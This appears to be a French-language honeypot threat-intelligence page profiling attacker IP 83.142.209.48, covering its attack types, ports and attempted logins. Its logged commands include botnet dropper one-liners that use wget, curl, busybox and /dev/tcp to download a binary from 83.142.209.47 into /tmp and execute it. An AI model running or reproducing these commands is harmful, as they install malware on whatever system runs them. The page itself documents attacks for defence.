Menace Active • CRITIQUE
83.142.209.48
Pays d'Origine🇳🇱 Paises Bajos
Premiere Detection02/03/2026
Derniere Activite30/03/2026
FAIGhosty Networks LLC
🎯
53
Attaques Totales
🔌
6
Ports
📡
7
Types d'Attaque
🦠
4
Malware
Geolocalisation
- Pays
- 🇳🇱 Paises Bajos
- Ville
- Inconnue
- ASN
- AS205759
- FAI
- Ghosty Networks LLC
Types d'Attaque
ssh_telnet_honeypot
yaml_exploit_honeypot
redis_honeypot
adb_honeypot
malware_capture
web_honeypot
tcp_trap
Ports Attaques
238081237555556379
Malware Associe
Identifiants Tentes
🔐root/root
2x🔐admin/admin
2xCommandes Executees
$
uname -m11x$
admin2x$
password2x$
cd /tmp;s=%s;p=%d;wget -q http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||curl -so .x http://$s:$p/$(uname -m)&&chmod +x .x&&./.x||busybox wget http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||wget -q http://$s:$p/dlr.$(uname -m) -O dlr&&chmod +x dlr&&./dlr||curl -so dlr http://$s:$p/dlr.$(uname -m)&&chmod +x dlr&&./dlr1x$
exec 3 <> /dev/tcp/83.142.209.47/801x$
while read l <& 31x$
/tmp/dlr1x$
cd /tmp;wget -q http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || curl -so .x http://83.142.209.47:80/$(uname -m) && chmod +x .x && ./.x || busybox wget http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || wget -q http://83.142.209.47:80/dlr.$(uname -m) -O dlr && chmod +x dlr && ./dlr || curl -so dlr http://83.142.209.47:80/dlr.$(uname -m) && chmod +x dlr && ./dlr1x$
exec 3<>/dev/tcp/83.142.209.47/80;echo -ne 'GET /dlr.'$(uname -m)' HTTP/1.0\r\n\r\n'>&3;while read l<&3;do [ -z "$l" ]&&break;done;cat<&3>/tmp/dlr;chmod +x /tmp/dlr;/tmp/dlr1x$
break1xExposition Shodan InternetDBShodan
Donnees InternetDB, pas en temps reel
Ports
226881
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux
Evaluation des Risques
80
/100
FaibleMoyenEleveCritique